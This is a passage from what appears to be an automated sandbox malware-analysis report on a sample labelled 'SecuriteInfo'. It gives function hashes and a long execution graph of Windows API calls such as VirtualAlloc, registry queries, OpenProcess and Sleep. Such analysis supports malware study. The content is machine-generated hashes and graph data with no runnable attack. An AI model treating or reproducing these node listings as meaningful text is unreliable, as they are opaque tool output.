                                                    • Opcode Fuzzy Hash: c7596de8203c3f65c8491a2df950a0ed3a4052eaa3583473067d21faacf96f56
                                                    • Instruction Fuzzy Hash: 50D05E22A043548FCB219FB894000DC7BA09AD5230B4441A3C098C7266D620C4968B22
                                                    Function 01410D60 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 42e9c318ec2634ad5ae108d6d1125c0049db94c9ed4b0767f08cdc3327d7f733
                                                    • Instruction ID: c71373c4723bbc0777a7af843203da12d734495d08cfce52bfce35246ba16554
                                                    • Opcode Fuzzy Hash: 42e9c318ec2634ad5ae108d6d1125c0049db94c9ed4b0767f08cdc3327d7f733
                                                    • Instruction Fuzzy Hash: DAD05E71A002058FCF04CB99E4008DCBBF1EFC8230F4981B6D01997672D6305482CB20
                                                    Function 01410DB1 Relevance: .0, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 727578dcc9e243b55025a3dfc30de36292fd6f63c9a7b7a2dc1b0fb22d643986
                                                    • Instruction ID: 8fbb6aa4503f1ef2a86259a9ad254a8b33d856a11762d3c6579d303c57710310
                                                    • Opcode Fuzzy Hash: 727578dcc9e243b55025a3dfc30de36292fd6f63c9a7b7a2dc1b0fb22d643986
                                                    • Instruction Fuzzy Hash: B2B01236A00008C5CF00CBC8F0003ECB770E7C0336F000063D20C63404833012A64693

                                                    Execution Graph

                                                    Execution Coverage:7.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:8.6%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:42
                                                    execution_graph 21364 406220 21365 406237 21364->21365 21366 406248 21364->21366 21381 406190 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 21365->21381 21367 406251 GetCurrentThreadId 21366->21367 21369 40625e 21366->21369 21367->21369 21377 405ec4 21369->21377 21371 406241 21371->21366 21372 4062a5 21373 4062d1 FreeLibrary 21372->21373 21375 4062d7 21372->21375 21373->21375 21374 406313 21375->21374 21376 406308 ExitProcess 21375->21376 21378 405f08 21377->21378 21379 405ed3 21377->21379 21378->21372 21379->21378 21382 414634 21379->21382 21381->21371 21383 41465c 21382->21383 21384 41463c 21382->21384 21383->21379 21385 41463f InterlockedCompareExchange 21384->21385 21385->21385 21386 41464d CloseHandle 21385->21386 21386->21383 21386->21385 21387 403220 21388 403230 21387->21388 21389 4032b8 21387->21389 21392 403274 21388->21392 21393 40323d 21388->21393 21390 4032c1 21389->21390 21391 402b58 21389->21391 21394 4032d9 21390->21394 21406 4033e8 21390->21406 21397 403533 21391->21397 21398 402b7a VirtualQuery 21391->21398 21399 402c5b 21391->21399 21395 402ca4 10 API calls 21392->21395 21396 403248 21393->21396 21400 402ca4 10 API calls 21393->21400 21402 4032fc 21394->21402 21407 4033c0 21394->21407 21430 4032e0 21394->21430 21418 40328b 21395->21418 21411 402c23 21398->21411 21412 402bb3 21398->21412 21405 402c59 21399->21405 21409 402ca4 10 API calls 21399->21409 21416 403255 21400->21416 21401 40344c 21403 402ca4 10 API calls 21401->21403 21423 403465 21401->21423 21415 40333c Sleep 21402->21415 21402->21430 21426 4034fc 21403->21426 21404 4032b1 21406->21401 21414 403424 Sleep 21406->21414 21406->21423 21413 402ca4 10 API calls 21407->21413 21428 402c72 21409->21428 21410 40326d 21439 402ca4 21411->21439 21412->21411 21421 402be0 VirtualAlloc 21412->21421 21422 402bde 21412->21422 21432 4033c9 21413->21432 21414->21401 21419 40343e Sleep 21414->21419 21420 403354 Sleep 21415->21420 21415->21430 21416->21410 21424 403028 10 API calls 21416->21424 21418->21404 21427 403028 10 API calls 21418->21427 21419->21406 21420->21402 21421->21411 21429 402bf6 VirtualAlloc 21421->21429 21422->21421 21424->21410 21425 4033e1 21426->21423 21433 403028 10 API calls 21426->21433 21427->21404 21428->21405 21434 403028 10 API calls 21428->21434 21429->21411 21431 402c0c 21429->21431 21431->21405 21432->21425 21436 403028 10 API calls 21432->21436 21437 403520 21433->21437 21434->21405 21435 402c2a 21435->21405 21463 403028 21435->21463 21436->21425 21440 402f04 21439->21440 21441 402cbc 21439->21441 21442 40301c 21440->21442 21443 402ec8 21440->21443 21449 402cce 21441->21449 21455 402d59 Sleep 21441->21455 21444 402a50 VirtualAlloc 21442->21444 21445 403025 21442->21445 21450 402ee2 Sleep 21443->21450 21452 402f22 21443->21452 21447 402a8b 21444->21447 21448 402a7b 21444->21448 21445->21435 21446 402cdd 21446->21435 21447->21435 21483 402a08 21448->21483 21449->21446 21456 402d9d Sleep 21449->21456 21458 402dbc 21449->21458 21450->21452 21454 402ef8 Sleep 21450->21454 21453 402f40 21452->21453 21457 402990 VirtualAlloc 21452->21457 21453->21435 21454->21443 21455->21449 21459 402d6f Sleep 21455->21459 21456->21458 21461 402db3 Sleep 21456->21461 21457->21453 21462 402dc8 21458->21462 21489 402990 21458->21489 21459->21441 21461->21449 21462->21435 21464 403120 21463->21464 21465 40303d 21463->21465 21466 402ab4 21464->21466 21467 403043 21464->21467 21465->21467 21470 4030ba Sleep 21465->21470 21468 40321a 21466->21468 21471 402a08 2 API calls 21466->21471 21469 40304c 21467->21469 21474 4030fe Sleep 21467->21474 21477 403135 21467->21477 21468->21405 21469->21405 21470->21467 21473 4030d4 Sleep 21470->21473 21472 402ac5 21471->21472 21475 402af5 21472->21475 21476 402adb VirtualFree 21472->21476 21473->21465 21474->21477 21478 403114 Sleep 21474->21478 21479 402aec 21475->21479 21480 402afe VirtualQuery VirtualFree 21475->21480 21476->21479 21481 4031b4 VirtualFree 21477->21481 21482 403158 21477->21482 21478->21467 21479->21405 21480->21475 21480->21479 21481->21405 21482->21405 21484 402a4e 21483->21484 21485 402a11 21483->21485 21484->21447 21485->21484 21486 402a1c Sleep 21485->21486 21487 402a31 21486->21487 21487->21484 21488 402a35 Sleep 21487->21488 21488->21485 21493 402924 21489->21493 21491 402998 VirtualAlloc 21492 4029af 21491->21492 21492->21462 21494 4028c4 21493->21494 21494->21491 21495 40f6c0 WriteFile 21496 40f6dd 21495->21496 21497 4046c0 21498 4046d0 WriteFile 21497->21498 21500 4046cc 21497->21500 21499 4046e8 GetLastError 21498->21499 21498->21500 21499->21500 21501 4083b0 21502 4083c0 GetModuleFileNameW 21501->21502 21504 4083dc 21501->21504 21505 40920c GetModuleFileNameW 21502->21505 21506 40925a 21505->21506 21511 40941c 21506->21511 21508 409286 21509 409298 LoadLibraryExW 21508->21509 21510 4092a0 21508->21510 21509->21510 21510->21504 21512 409455 21511->21512 21533 406bf0 21512->21533 21514 40947d 21515 40948f lstrcpynW lstrlenW 21514->21515 21516 4094b9 21515->21516 21518 40952a 21516->21518 21554 408f6c 21516->21554 21518->21508 21519 409515 21520 40951e 21519->21520 21521 40952f GetUserDefaultUILanguage 21519->21521 21522 409310 3 API calls 21520->21522 21578 408c28 EnterCriticalSection 21521->21578 21522->21518 21524 409540 21601 409310 21524->21601 21526 40954b 21527 409577 21526->21527 21528 40955b GetSystemDefaultUILanguage 21526->21528 21527->21518 21606 4093c0 GetUserDefaultUILanguage GetLocaleInfoW 21527->21606 21529 408c28 33 API calls 21528->21529 21531 40956c 21529->21531 21532 409310 3 API calls 21531->21532 21532->21527 21534 406bf4 21533->21534 21537 406c10 21533->21537 21534->21533 21536 406c00 21534->21536 21540 40716f 21534->21540 21541 4070b0 21534->21541 21535 406c40 21535->21514 21536->21537 21611 407504 21536->21611 21537->21535 21616 4041cc 14 API calls 21537->21616 21541->21540 21542 406bf0 15 API calls 21541->21542 21544 4070c3 21541->21544 21542->21544 21543 40710c 21543->21540 21547 407504 14 API calls 21543->21547 21546 4070ee 21544->21546 21617 406504 15 API calls 21544->21617 21546->21543 21618 406504 15 API calls 21546->21618 21550 407122 21547->21550 21549 40715a 21552 406bf0 15 API calls 21549->21552 21550->21549 21619 406368 14 API calls 21550->21619 21553 40716b 21552->21553 21553->21514 21555 408f83 21554->21555 21556 408f97 GetModuleFileNameW 21555->21556 21557 408fac 21555->21557 21558 408fc6 21556->21558 21559 408fb9 lstrcpynW 21557->21559 21560 408fd4 RegOpenKeyExW 21558->21560 21567 40913b 21558->21567 21559->21558 21561 409055 21560->21561 21562 408ff7 RegOpenKeyExW 21560->21562 21629 408d70 12 API calls 21561->21629 21562->21561 21563 409015 RegOpenKeyExW 21562->21563 21563->21561 21565 409033 RegOpenKeyExW 21563->21565 21565->21561 21565->21567 21566 409073 RegQueryValueExW 21568 409091 21566->21568 21569 4090c4 RegQueryValueExW 21566->21569 21567->21519 21572 4041b0 14 API calls 21568->21572 21570 4090e0 21569->21570 21571 4090c2 21569->21571 21573 4041b0 14 API calls 21570->21573 21575 40912a RegCloseKey 21571->21575 21630 4041cc 14 API calls 21571->21630 21574 409099 RegQueryValueExW 21572->21574 21576 4090e8 RegQueryValueExW 21573->21576 21574->21571 21575->21519 21576->21571 21579 408c74 LeaveCriticalSection 21578->21579 21580 408c54 21578->21580 21581 406bf0 15 API calls 21579->21581 21582 408c65 LeaveCriticalSection 21580->21582 21583 408c87 IsValidLocale 21581->21583 21592 408d17 21582->21592 21584 408ce5 EnterCriticalSection 21583->21584 21585 408c96 21583->21585 21671 406c7c 21584->21671 21587 408caa 21585->21587 21588 408c9f 21585->21588 21632 408908 18 API calls 21587->21632 21631 408b08 20 API calls 21588->21631 21592->21524 21593 408cb3 GetSystemDefaultUILanguage 21593->21584 21595 408cbd 21593->21595 21594 408ca8 21594->21584 21596 408cce GetSystemDefaultUILanguage 21595->21596 21633 406fe0 21595->21633 21670 408908 18 API calls 21596->21670 21599 408cdb 21600 406fe0 15 API calls 21599->21600 21600->21584 21602 409324 21601->21602 21603 409393 21602->21603 21604 409365 lstrcpynW 21602->21604 21603->21526 21700 4092d8 FindFirstFileW 21604->21700 21607 4092d8 2 API calls 21606->21607 21608 4093f3 21607->21608 21609 4092d8 2 API calls 21608->21609 21610 409410 21608->21610 21609->21610 21610->21518 21612 40753d 21611->21612 21613 407508 21611->21613 21612->21537 21613->21612 21620 4041b0 21613->21620 21615 407517 21615->21537 21616->21535 21617->21546 21618->21543 21619->21549 21622 4041b4 21620->21622 21621 4042c5 21628 404294 10 API calls 21621->21628 21622->21615 21622->21621 21623 4041be 21622->21623 21627 40a264 14 API calls 21622->21627 21623->21615 21626 4042e6 21626->21615 21627->21621 21628->21626 21629->21566 21630->21575 21631->21594 21632->21593 21634 406fe8 21633->21634 21644 407099 21633->21644 21635 406ff2 21634->21635 21647 406bf0 21634->21647 21637 407069 21635->21637 21638 406ffd 21635->21638 21636 406c10 21639 406c40 21636->21639 21673 4041cc 14 API calls 21636->21673 21645 407079 21637->21645 21693 406504 15 API calls 21637->21693 21649 407009 21638->21649 21674 406504 15 API calls 21638->21674 21639->21596 21640 406c00 21640->21636 21648 407504 14 API calls 21640->21648 21642 407029 21642->21644 21676 406f48 21642->21676 21644->21596 21645->21644 21646 406f48 15 API calls 21645->21646 21655 407045 21646->21655 21647->21636 21647->21640 21652 40716f 21647->21652 21653 4070b0 21647->21653 21648->21636 21649->21642 21675 406504 15 API calls 21649->21675 21653->21652 21657 406bf0 15 API calls 21653->21657 21660 4070c3 21653->21660 21656 407064 21655->21656 21689 406344 21655->21689 21656->21596 21657->21660 21658 40710c 21658->21652 21663 407504 14 API calls 21658->21663 21662 4070ee 21660->21662 21694 406504 15 API calls 21660->21694 21662->21658 21695 406504 15 API calls 21662->21695 21665 407122 21663->21665 21666 40715a 21665->21666 21696 406368 14 API calls 21665->21696 21668 406bf0 15 API calls 21666->21668 21669 40716b 21668->21669 21669->21596 21670->21599 21672 406c80 lstrcpynW LeaveCriticalSection 21671->21672 21672->21592 21673->21639 21674->21649 21675->21642 21677 406fb8 21676->21677 21678 406f55 21676->21678 21679 406344 14 API calls 21677->21679 21682 406f6d 21678->21682 21683 406fac 21678->21683 21697 406d1c 15 API calls 21678->21697 21688 406fa9 21679->21688 21680 407504 14 API calls 21680->21677 21682->21683 21684 406f86 21682->21684 21683->21680 21698 4041e4 14 API calls 21684->21698 21686 406f8e 21687 406344 14 API calls 21686->21687 21686->21688 21687->21688 21688->21655 21690 40634a 21689->21690 21692 406365 21689->21692 21690->21692 21699 4041cc 14 API calls 21690->21699 21692->21656 21693->21645 21694->21662 21695->21658 21696->21666 21697->21682 21698->21686 21699->21692 21701 409301 FindClose 21700->21701 21702 409307 21700->21702 21701->21702 21702->21602 21703 409d02 GetSystemInfo 21704 4069d4 21705 4068c4 21704->21705 21706 4069dc SysAllocStringLen 21704->21706 21709 4068d8 21705->21709 21710 4068ca SysFreeString 21705->21710 21707 406894 21706->21707 21708 4069ec SysFreeString 21706->21708 21711 4068b0 21707->21711 21712 4068a0 SysAllocStringLen 21707->21712 21710->21709 21712->21707 21712->21711 21713 40a178 21714 40a191 21713->21714 21715 40a1d2 21713->21715 21731 40493c 14 API calls 21714->21731 21717 40a19b 21732 40493c 14 API calls 21717->21732 21719 40a1a5 21733 40493c 14 API calls 21719->21733 21721 40a1af 21734 40874c DeleteCriticalSection 21721->21734 21723 40a1b4 21735 404144 21723->21735 21727 40a1be 21728 406344 14 API calls 21727->21728 21729 40a1c8 21728->21729 21730 406344 14 API calls 21729->21730 21730->21715 21731->21717 21732->21719 21733->21721 21734->21723 21736 40414d CloseHandle 21735->21736 21737 40415f 21735->21737 21736->21737 21738 40416d 21737->21738 21751 403b64 VirtualQuery Sleep Sleep VirtualAlloc MessageBoxA 21737->21751 21740 404176 VirtualFree 21738->21740 21741 40418f 21738->21741 21740->21741 21745 4040b4 21741->21745 21744 40a15f 6 API calls 21744->21727 21746 4040d9 21745->21746 21747 4040c7 VirtualFree 21746->21747 21748 4040dd 21746->21748 21747->21746 21749 404124 VirtualFree 21748->21749 21750 40413a 21748->21750 21749->21748 21750->21744 21751->21738 21752 44373c 21753 443744 21752->21753 21753->21753 22183 40a2b0 GetModuleHandleW 21753->22183 21761 44378b 21762 407450 15 API calls 21761->21762 21763 443797 21762->21763 21764 404cdc 14 API calls 21763->21764 21765 44379c 21764->21765 21766 4042f8 14 API calls 21765->21766 21767 4437a1 21766->21767 21768 407450 15 API calls 21767->21768 21769 4437ad 21768->21769 21770 404cdc 14 API calls 21769->21770 21771 4437b2 21770->21771 21772 4042f8 14 API calls 21771->21772 21773 4437b7 21772->21773 21774 407450 15 API calls 21773->21774 21775 4437c0 21774->21775 21776 404cdc 14 API calls 21775->21776 21777 4437c5 21776->21777 21778 4042f8 14 API calls 21777->21778 21779 4437ca 21778->21779 22209 404504 GetCommandLineW 21779->22209 21781 4437cf 21782 443876 21781->21782 22214 404564 21781->22214 21784 407450 15 API calls 21782->21784 21786 443882 21784->21786 21788 404cdc 14 API calls 21786->21788 21789 443887 21788->21789 21791 4042f8 14 API calls 21789->21791 21790 4437f0 21792 44396a 21790->21792 21795 404564 17 API calls 21790->21795 21794 44388c 21791->21794 21793 404564 17 API calls 21792->21793 21796 443977 21793->21796 21797 407450 15 API calls 21794->21797 21798 443803 21795->21798 21799 4072a4 15 API calls 21796->21799 21800 443898 21797->21800 21801 4072a4 15 API calls 21798->21801 21802 443984 21799->21802 21803 404cdc 14 API calls 21800->21803 21804 443810 21801->21804 21805 443986 21802->21805 21806 4439ac 21802->21806 21807 44389d 21803->21807 21804->21792 21810 404564 17 API calls 21804->21810 22938 43cea4 21805->22938 21814 4439bc 21806->21814 21815 4439ed 21806->21815 21809 4042f8 14 API calls 21807->21809 21812 4438a2 21809->21812 21813 443823 21810->21813 21811 443993 21817 407450 15 API calls 21811->21817 21818 407450 15 API calls 21812->21818 21816 4072a4 15 API calls 21813->21816 21819 407450 15 API calls 21814->21819 22233 43a644 GetNativeSystemInfo 21815->22233 21820 443830 21816->21820 21821 44399d 21817->21821 21822 4438ab 21818->21822 21824 4439c8 21819->21824 21820->21792 21831 404564 17 API calls 21820->21831 21825 404cdc 14 API calls 21821->21825 21826 404cdc 14 API calls 21822->21826 21830 404cdc 14 API calls 21824->21830 21832 4439a2 21825->21832 21833 4438b0 21826->21833 21828 4439f6 21834 407450 15 API calls 21828->21834 21829 443a11 22235 43a7bc 21829->22235 21835 4439cd 21830->21835 21836 443843 21831->21836 21838 4042f8 14 API calls 21832->21838 21839 4042f8 14 API calls 21833->21839 21840 443a02 21834->21840 21841 4042f8 14 API calls 21835->21841 21842 4072a4 15 API calls 21836->21842 21849 443965 21838->21849 21844 4438b5 21839->21844 21845 404cdc 14 API calls 21840->21845 21846 4439d2 21841->21846 21847 443850 21842->21847 21843 443a16 21848 404564 17 API calls 21843->21848 21850 407450 15 API calls 21844->21850 21852 443a07 21845->21852 21853 407450 15 API calls 21846->21853 21847->21792 21858 404564 17 API calls 21847->21858 21854 443a23 21848->21854 21851 4438c1 21850->21851 21855 404cdc 14 API calls 21851->21855 21856 4042f8 14 API calls 21852->21856 21857 4439de 21853->21857 21859 4072a4 15 API calls 21854->21859 21860 4438c6 21855->21860 21856->21849 21861 404cdc 14 API calls 21857->21861 21862 443863 21858->21862 21863 443a30 21859->21863 21864 4042f8 14 API calls 21860->21864 21865 4439e3 21861->21865 21866 4072a4 15 API calls 21862->21866 21867 443cc4 21863->21867 21872 443a5f 21863->21872 21873 407450 15 API calls 21863->21873 21868 4438cb 21864->21868 21870 4042f8 14 API calls 21865->21870 21871 443870 21866->21871 21869 404564 17 API calls 21867->21869 21874 407450 15 API calls 21868->21874 21875 443cd1 21869->21875 21870->21849 21871->21782 21871->21792 21876 407450 15 API calls 21872->21876 21877 443a4b 21873->21877 21878 4438d7 21874->21878 21879 4072a4 15 API calls 21875->21879 21880 443a6b 21876->21880 21881 404cdc 14 API calls 21877->21881 21882 404cdc 14 API calls 21878->21882 21883 443cde 21879->21883 21884 404cdc 14 API calls 21880->21884 21885 443a50 21881->21885 21886 4438dc 21882->21886 21887 443e6b 21883->21887 21892 443d0d 21883->21892 21898 407450 15 API calls 21883->21898 21888 443a70 21884->21888 21890 4042f8 14 API calls 21885->21890 21891 4042f8 14 API calls 21886->21891 21889 404564 17 API calls 21887->21889 21893 4042f8 14 API calls 21888->21893 21894 443e78 21889->21894 21896 443a55 21890->21896 21897 4438e1 21891->21897 21895 407450 15 API calls 21892->21895 21899 443a75 21893->21899 21900 4072a4 15 API calls 21894->21900 21901 443d19 21895->21901 22942 40632c 10 API calls 21896->22942 21903 407450 15 API calls 21897->21903 21904 443cf9 21898->21904 21905 407450 15 API calls 21899->21905 21906 443e85 21900->21906 21907 404cdc 14 API calls 21901->21907 21908 4438ed 21903->21908 21909 404cdc 14 API calls 21904->21909 21910 443a81 21905->21910 21912 443ecb 21906->21912 21918 443eb0 21906->21918 21919 443e90 21906->21919 21913 443d1e 21907->21913 21914 404cdc 14 API calls 21908->21914 21915 443cfe 21909->21915 21911 404cdc 14 API calls 21910->21911 21917 443a86 21911->21917 21921 404564 17 API calls 21912->21921 21920 4042f8 14 API calls 21913->21920 21922 4438f2 21914->21922 21916 4042f8 14 API calls 21915->21916 21923 443d03 21916->21923 21925 4042f8 14 API calls 21917->21925 21924 407450 15 API calls 21918->21924 21926 407450 15 API calls 21919->21926 21927 443d23 21920->21927 21928 443ed8 21921->21928 21929 4042f8 14 API calls 21922->21929 22944 40632c 10 API calls 21923->22944 21932 443ebc 21924->21932 21933 443a8b 21925->21933 21934 443e9c 21926->21934 21935 443d31 21927->21935 21936 443d2c 21927->21936 21937 4072a4 15 API calls 21928->21937 21930 4438f7 21929->21930 21938 407450 15 API calls 21930->21938 21939 404cdc 14 API calls 21932->21939 21940 407450 15 API calls 21933->21940 21941 404cdc 14 API calls 21934->21941 21944 43b7d4 52 API calls 21935->21944 21942 43a688 18 API calls 21936->21942 21943 443ee5 21937->21943 21945 443903 21938->21945 21946 443ec1 21939->21946 21947 443a97 21940->21947 21948 443ea1 21941->21948 21942->21935 21943->21849 21949 443eeb 21943->21949 21950 443d36 21944->21950 21951 404cdc 14 API calls 21945->21951 21952 4042f8 14 API calls 21946->21952 21953 404cdc 14 API calls 21947->21953 21954 4042f8 14 API calls 21948->21954 21955 407450 15 API calls 21949->21955 21956 407450 15 API calls 21950->21956 21958 443908 21951->21958 21959 443ec6 21952->21959 21960 443a9c 21953->21960 21961 443ea6 21954->21961 21962 443ef7 21955->21962 21957 443d42 21956->21957 21964 404cdc 14 API calls 21957->21964 21965 4042f8 14 API calls 21958->21965 22949 43f7a4 129 API calls 21959->22949 21967 4042f8 14 API calls 21960->21967 22948 40632c 10 API calls 21961->22948 21963 404cdc 14 API calls 21962->21963 21969 443efc 21963->21969 21970 443d47 21964->21970 21971 44390d 21965->21971 21972 443aa1 21967->21972 21973 4042f8 14 API calls 21969->21973 21974 4042f8 14 API calls 21970->21974 21975 407450 15 API calls 21971->21975 21976 407450 15 API calls 21972->21976 21977 443f01 21973->21977 21978 443d4c 21974->21978 21979 443919 21975->21979 21980 443aad 21976->21980 21981 43b7d4 52 API calls 21977->21981 22945 43c9b4 77 API calls 21978->22945 21983 404cdc 14 API calls 21979->21983 21984 404cdc 14 API calls 21980->21984 21985 443f06 21981->21985 21987 44391e 21983->21987 21988 443ab2 21984->21988 21989 407450 15 API calls 21985->21989 21986 443d51 21990 407450 15 API calls 21986->21990 21991 4042f8 14 API calls 21987->21991 21992 4042f8 14 API calls 21988->21992 21993 443f12 21989->21993 21994 443d5d 21990->21994 21995 443923 21991->21995 21996 443ab7 21992->21996 21998 404cdc 14 API calls 21993->21998 21999 404cdc 14 API calls 21994->21999 22000 407450 15 API calls 21995->22000 21997 407450 15 API calls 21996->21997 22001 443ac3 21997->22001 22002 443f17 21998->22002 22003 443d62 21999->22003 22004 44392f 22000->22004 22005 404cdc 14 API calls 22001->22005 22006 4042f8 14 API calls 22002->22006 22007 4042f8 14 API calls 22003->22007 22008 404cdc 14 API calls 22004->22008 22010 443ac8 22005->22010 22011 443f1c 22006->22011 22012 443d67 22007->22012 22009 443934 22008->22009 22013 4042f8 14 API calls 22009->22013 22014 4042f8 14 API calls 22010->22014 22015 43bf00 23 API calls 22011->22015 22016 43bf00 23 API calls 22012->22016 22017 443939 22013->22017 22018 443acd 22014->22018 22019 443f26 22015->22019 22020 443d71 22016->22020 22021 407450 15 API calls 22017->22021 22022 407450 15 API calls 22018->22022 22023 43c1c8 21 API calls 22019->22023 22024 43c1c8 21 API calls 22020->22024 22026 443945 22021->22026 22027 443ad9 22022->22027 22028 443f30 Sleep 22023->22028 22025 443d7b Sleep 22024->22025 22029 407450 15 API calls 22025->22029 22030 404cdc 14 API calls 22026->22030 22031 404cdc 14 API calls 22027->22031 22051 443f44 22028->22051 22032 443d91 22029->22032 22033 44394a 22030->22033 22034 443ade 22031->22034 22036 404cdc 14 API calls 22032->22036 22037 4042f8 14 API calls 22033->22037 22038 4042f8 14 API calls 22034->22038 22035 443f6d Sleep 22041 43b58c 27 API calls 22035->22041 22039 443d96 22036->22039 22040 44394f 22037->22040 22042 443ae3 22038->22042 22043 4042f8 14 API calls 22039->22043 22044 407450 15 API calls 22040->22044 22045 443f81 22041->22045 22046 407450 15 API calls 22042->22046 22047 443d9b 22043->22047 22048 44395b 22044->22048 22049 407450 15 API calls 22045->22049 22050 443aef 22046->22050 22946 43d938 24 API calls 22047->22946 22053 404cdc 14 API calls 22048->22053 22054 443f8d 22049->22054 22055 404cdc 14 API calls 22050->22055 22051->22035 22056 43b58c 27 API calls 22051->22056 22057 443960 22053->22057 22058 404cdc 14 API calls 22054->22058 22059 443af4 22055->22059 22056->22051 22061 4042f8 14 API calls 22057->22061 22062 443f92 22058->22062 22060 4042f8 14 API calls 22059->22060 22064 443af9 22060->22064 22061->21849 22063 4042f8 14 API calls 22062->22063 22063->21849 22065 404564 17 API calls 22064->22065 22067 443b06 22065->22067 22066 443dd3 Sleep 22068 43b58c 27 API calls 22066->22068 22069 4072a4 15 API calls 22067->22069 22070 443de7 Sleep 22068->22070 22071 443b13 22069->22071 22072 404564 17 API calls 22070->22072 22074 443b15 22071->22074 22075 443b26 22071->22075 22076 443dfe 22072->22076 22073 443da0 22073->22066 22077 43b58c 27 API calls 22073->22077 22078 406bf0 15 API calls 22074->22078 22080 406bf0 15 API calls 22075->22080 22079 4072a4 15 API calls 22076->22079 22077->22073 22081 443b24 22078->22081 22082 443e0b 22079->22082 22080->22081 22084 443b43 22081->22084 22329 43a688 GetModuleHandleW 22081->22329 22083 443e47 22082->22083 22086 407450 15 API calls 22082->22086 22085 443e55 22083->22085 22947 43a724 18 API calls 22083->22947 22334 43de78 22084->22334 22092 407450 15 API calls 22085->22092 22091 443e19 22086->22091 22089 443b48 22433 43b7d4 22089->22433 22094 404cdc 14 API calls 22091->22094 22095 443e61 22092->22095 22097 443e1e 22094->22097 22098 404cdc 14 API calls 22095->22098 22101 4042f8 14 API calls 22097->22101 22099 443e66 22098->22099 22102 4042f8 14 API calls 22099->22102 22100 407450 15 API calls 22103 443b59 22100->22103 22104 443e23 22101->22104 22102->21887 22106 404cdc 14 API calls 22103->22106 22105 43e864 85 API calls 22104->22105 22107 443e2a 22105->22107 22108 443b5e 22106->22108 22109 407450 15 API calls 22107->22109 22110 4042f8 14 API calls 22108->22110 22111 443e36 22109->22111 22112 443b63 22110->22112 22113 404cdc 14 API calls 22111->22113 22114 404564 17 API calls 22112->22114 22115 443e3b 22113->22115 22116 443b70 22114->22116 22117 4042f8 14 API calls 22115->22117 22118 4072a4 15 API calls 22116->22118 22119 443e40 22117->22119 22120 443b7d 22118->22120 22121 43f310 21 API calls 22119->22121 22122 443b99 22120->22122 22123 404564 17 API calls 22120->22123 22121->22083 22502 43d0f8 22122->22502 22125 443b8c 22123->22125 22126 4072a4 15 API calls 22125->22126 22126->22122 22127 443bab 22128 407450 15 API calls 22127->22128 22129 443bb7 22128->22129 22130 404cdc 14 API calls 22129->22130 22131 443bbc 22130->22131 22132 4042f8 14 API calls 22131->22132 22133 443bc1 22132->22133 22652 43c598 22133->22652 22135 443bc6 22136 407450 15 API calls 22135->22136 22137 443bd2 22136->22137 22138 404cdc 14 API calls 22137->22138 22139 443bd7 22138->22139 22140 4042f8 14 API calls 22139->22140 22141 443bdc 22140->22141 22685 43e7dc 22141->22685 22144 407450 15 API calls 22145 443bed 22144->22145 22146 404cdc 14 API calls 22145->22146 22147 443bf2 22146->22147 22148 4042f8 14 API calls 22147->22148 22149 443bf7 22148->22149 22694 43bf00 22149->22694 22151 443c01 22731 43c1c8 OpenProcess 22151->22731 22153 443c0b Sleep 22158 443c1f 22153->22158 22154 443c48 Sleep 22758 43b58c 22154->22758 22156 443c5c Sleep 22157 407450 15 API calls 22156->22157 22159 443c72 22157->22159 22158->22154 22160 43b58c 27 API calls 22158->22160 22161 404cdc 14 API calls 22159->22161 22160->22158 22162 443c77 22161->22162 22163 4042f8 14 API calls 22162->22163 22164 443c7c 22163->22164 22786 43e864 22164->22786 22166 443c83 22167 407450 15 API calls 22166->22167 22168 443c8f 22167->22168 22169 404cdc 14 API calls 22168->22169 22170 443c94 22169->22170 22171 4042f8 14 API calls 22170->22171 22172 443c99 22171->22172 22931 43f310 22172->22931 22174 443ca0 22175 407450 15 API calls 22174->22175 22176 443cac 22175->22176 22177 404cdc 14 API calls 22176->22177 22178 443cb1 22177->22178 22179 4042f8 14 API calls 22178->22179 22180 443cb6 22179->22180 22180->21867 22181 443cbf 22180->22181 22943 43a724 18 API calls 22181->22943 22184 40a2eb 22183->22184 22950 405f98 22184->22950 22187 407450 22188 407473 22187->22188 22995 406824 22188->22995 22193 404cdc 22194 404d02 22193->22194 22195 404ce7 22193->22195 22197 404be8 14 API calls 22194->22197 22196 404be8 14 API calls 22195->22196 22198 404cfe 22196->22198 22197->22198 23038 404930 22198->23038 22201 4042f8 23048 40a264 14 API calls 22201->23048 22203 40430c 22203->21761 22204 4042a0 22204->22203 22205 4042c5 22204->22205 23046 40a264 14 API calls 22204->23046 23047 404294 10 API calls 22205->23047 22208 4042e6 22208->21761 23049 404448 22209->23049 22211 404448 15 API calls 22212 404528 22211->22212 22212->22211 22213 40453f 22212->22213 22213->21781 22215 406bf0 15 API calls 22214->22215 22216 40457a 22215->22216 22217 40459c GetCommandLineW 22216->22217 22218 40457e GetModuleFileNameW 22216->22218 22223 4045a3 22217->22223 23053 406d2c 22218->23053 22221 404448 15 API calls 22221->22223 22222 4045ba 22224 4072a4 22222->22224 22223->22221 22223->22222 22225 4072a8 22224->22225 22228 4072b8 22224->22228 22225->22228 23058 406d1c 15 API calls 22225->23058 22227 4072f2 22229 4072a4 15 API calls 22227->22229 22228->21790 22230 4072fb 22229->22230 23059 4041cc 14 API calls 22230->23059 22232 407306 22232->21790 22234 43a657 22233->22234 22234->21828 22234->21829 22236 43a7e1 22235->22236 22237 43a7f6 22235->22237 23121 4387ec 18 API calls 22236->23121 23122 4387a8 18 API calls 22237->23122 22240 43a7f2 23060 438890 22240->23060 22244 43a81c 22245 43a863 22244->22245 22248 43a827 GetLastError 22244->22248 23093 439408 22245->23093 22250 407450 15 API calls 22248->22250 22252 43a843 22250->22252 23123 407dec 22252->23123 22256 407450 15 API calls 22257 43a852 22256->22257 